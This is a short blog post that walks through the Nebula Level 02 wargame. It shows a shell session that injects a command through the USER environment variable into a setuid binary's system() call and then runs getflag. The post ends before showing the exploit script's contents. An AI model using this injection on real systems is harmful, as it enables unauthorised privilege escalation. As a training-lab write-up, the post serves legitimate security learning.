After completing Nebula Level 01, I decided to quickly run into Nebula Level 02. After quickly looking at the code they have provided, it came evident that Level01, and Level02 were very similar, just different in the way you launch the exploit. Level01 was exploited by having a script named with the binary that was being called. In this exploit you want to use the USER variable, and assign the code you want to run to it.
Here is what I did to accomplish this exploit:
flag02@nebula:~$ pwd /home/level02 level02@nebula:~$ chmod g+x exploit level02@nebula:~$ USER='-e "I am going to get the flag"; ~/exploit' level02@nebula:~$ /home/flag02/flag02 about to call system("/bin/echo -e "I am going to get the flag"; ~/exploit is cool") I am going to get the flag flag02@nebula:~$ getflag You have successfully executed getflag on a target account
I’m now going to move onto Nebula Level 03, when I get a chance.
Note: Not sure why the cat of exploit didn’t show (probably issues with wp-syntax and my theme), but exploit was just a script with :